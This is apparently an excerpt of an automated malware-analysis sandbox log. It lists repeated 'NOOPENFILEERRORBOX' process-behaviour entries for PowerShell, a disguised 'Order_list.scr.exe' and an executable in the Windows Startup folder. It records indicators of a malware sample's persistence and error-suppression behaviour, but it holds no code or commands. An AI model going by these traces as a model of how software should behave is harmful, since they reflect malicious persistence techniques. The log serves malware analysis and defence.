Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Order_list.scr.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Order_list.scr.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Order_list.scr.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Order_list.scr.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Order_list.scr.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Order_list.scr.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Order_list.scr.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Order_list.scr.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Order_list.scr.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Order_list.scr.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Order_list.scr.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Order_list.scr.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Order_list.scr.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Order_list.scr.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Order_list.scr.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Order_list.scr.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Order_list.scr.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Order_list.scr.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Order_list.scr.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Order_list.scr.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Order_list.scr.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Order_list.scr.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Order_list.scr.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Order_list.scr.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Order_list.scr.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Order_list.scr.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Order_list.scr.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Order_list.scr.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Order_list.scr.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Order_list.scr.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Order_list.scr.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Order_list.scr.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Order_list.scr.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Order_list.scr.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Order_list.scr.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Order_list.scr.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Order_list.scr.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Order_list.scr.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Order_list.scr.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Order_list.scr.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Order_list.scr.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Order_list.scr.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Order_list.scr.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Order_list.scr.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Order_list.scr.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Order_list.scr.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Order_list.scr.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Order_list.scr.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Order_list.scr.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Order_list.scr.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Order_list.scr.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Order_list.scr.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Order_list.scr.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Order_list.scr.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Order_list.scr.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Order_list.scr.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Order_list.scr.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Order_list.scr.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\00.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\00.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\00.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\00.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\00.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\00.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\00.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\00.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\00.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\00.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\00.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\00.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\00.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\00.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\00.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\00.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\00.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\00.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\00.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\00.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\00.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\00.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\00.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\00.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\00.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\00.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\00.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\00.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\00.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\00.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\00.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\00.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\00.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\00.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\00.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\00.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\00.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\00.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\00.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\00.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\00.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\00.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\00.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\00.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\00.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\00.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\00.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\00.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\00.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\00.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\00.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\00.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\00.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\00.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\00.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\00.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\00.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\00.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\00.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\00.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\00.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\00.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\00.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\00.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\00.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\00.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\00.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\00.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\00.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\00.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\00.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\00.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\00.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\00.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\00.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\00.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\00.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\00.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\00.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\00.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\00.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\00.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
